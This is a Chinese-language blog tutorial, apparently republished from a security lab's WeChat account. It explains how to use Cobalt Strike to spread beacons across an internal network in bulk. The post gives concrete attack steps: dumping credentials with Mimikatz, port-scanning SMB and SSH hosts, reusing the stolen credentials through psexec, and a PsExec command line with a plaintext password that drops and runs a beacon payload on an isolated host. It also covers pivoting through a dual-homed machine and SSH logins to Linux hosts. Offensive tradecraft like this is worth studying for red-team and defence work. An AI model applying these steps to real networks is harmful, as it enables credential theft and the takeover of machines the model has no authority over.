如何利用CobalStrike进行批量上线?

admin 2021年1月6日21:54:40评论166 views字数 1804阅读6分0秒阅读模式
如何利用CobalStrike进行批量上线?
点击上方蓝字关注我哦
如何利用CobalStrike进行批量上线?

出品|MS08067实验室

本文作者:BlackCat(Ms08067内网安全小组成员)

BlackCat微信(欢迎骚扰交流):

如何利用CobalStrike进行批量上线?

前言:

当获取一台目标服务器权限时,更多是想办法扩大战果,获取目标凭据并横向进行登陆是最快速的拿权方式。但目标所处环境是否可出网,如何利用CobalStrike进行批量上线?

一、获取凭证:

目标机器CobalSt rike上线后,通常先抓取该主机凭据,选择执行Access->Run Mimikatz,或在 Beacon中执行logonpasswords命令。需要当前会话为管理员权限,才能成功,如果权限低,先提权~

下面的是执行logonpasswords

图形中是这个。

如何利用CobalStrike进行批量上线?


如何利用CobalStrike进行批量上线?


然后查看凭证,Gredentials

如何利用CobalStrike进行批量上线?


但是不是每次都能抓取到明文

二、目标机出网:

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalSt rike 本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec :在主机上使 用服务派生会话)

使用portscan命令:ip网段—ports端口 一扫描协议(arp、icmp、none) 一线程(实战不要过高)。

这里我环境开了一台03的虚拟机,地址是192.168.19.134看能搜集到探测她的445端口

beacon> portscan 192.168.19.0/24 445 arp 200

如何利用CobalStrike进行批量上线?


点击工具栏的V iew->Ta rgets,查看端口探测后的存活主机。

如何利用CobalStrike进行批量上线?


如何利用CobalStrike进行批量上线?
如何利用CobalStrike进行批量上线?


然后右键,用之前收集到的凭证去试其他存活主机。如果在一个域中,所有主机的用户名和密码应该都 是一致的。

右键机器:

如何利用CobalStrike进行批量上线?


然后选择之前的获取的账号和密码,明文密文都可以,session选择之前的控机。

如何利用CobalStrike进行批量上线?


然后在beacon中就可以看到执行的命令。并且这台03的机器就会成功的上线

如何利用CobalStrike进行批量上线?


如何利用CobalStrike进行批量上线?


三、目标机不出网

实战中经常会遇到这种情况,获取到目标内网中某台主机的系统权限,但是该主机处在隔离网络中,不能出网。又因为CobalStrike服务端是搭建在互联网中的,通过常规方式是无法上线的,这里就需要利用已上线的主机,将它做一个Listener,实现链路上线CobalStrike。

注:此实验只能在4.0版本以下进行

环境模拟:

主机08服务器:192.168.203.128/24 #不出网

边界服务器:win7双网卡:192.168.19.132、192.168.203.129

vps:X.X.X.X

win7和08服务器能互相访问,但是vps访问不了08已有权限win7,试验目的,想要08系统在CS端上线,这里借鉴一下网上的方法,利用PxExec来把生成的后门传到不出网机器上,

首先把他们两个放到一个目录下

那么如何放进去呢?CS自带一个文件浏览器,只不过速度有些慢,可以的话尽量用webshell工具,直接上刀上剑放蝎子。。

如何利用CobalStrike进行批量上线?


这里是放到已控机器的同一目录。

如何利用CobalStrike进行批量上线?


然后执行命令:

beacon> shellC:WindowsTempPsExec64.exe-accepteula \192.168.203.129,192.168.203.128 -uadministrator-pasdqwe123. -d-cC:WindowsTempbeacon65.exe

等待上线即可、、

个人觉得这个方法太过麻烦,如果这里用l cx,ew等代理攻击进行的话,会更加的省时省力~


四、Linux主机-SSH批量上线

第一步还是探测存活主机,然后利用已控的机器进行操作上线。

环境:

CentOS: 192.168.19.139

win7:192.168.19.132

vps :x.x.x.x

通过扫描发现机器:

beacon> portscan 192.168.19.100-150 22 arp 200

如何利用CobalStrike进行批量上线?


然后观看存活主机

然后

如何利用CobalStrike进行批量上线?


建议用ssh-key

密码建议用其他方式去获取,这里爆破的话效率不高输入对的账号密码后

如何利用CobalStrike进行批量上线?


然后正常等待上线即可

如何利用CobalStrike进行批量上线?


成功上线

本文参考:

https://payloads.cn/2020/0105/how-to-penetrate-the-int ranet-in-actual-combat.html


内网小组持续招人,扫描二维码加入我们!

如何利用CobalStrike进行批量上线?




扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

如何利用CobalStrike进行批量上线? 如何利用CobalStrike进行批量上线?

如何利用CobalStrike进行批量上线?如何利用CobalStrike进行批量上线?

如何利用CobalStrike进行批量上线? 如何利用CobalStrike进行批量上线?

目前35000+人已关注加入我们


如何利用CobalStrike进行批量上线?

本文始发于微信公众号(Ms08067安全实验室):如何利用CobalStrike进行批量上线?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月6日21:54:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何利用CobalStrike进行批量上线?http://cn-sec.com/archives/234176.html

发表评论

匿名网友 填写信息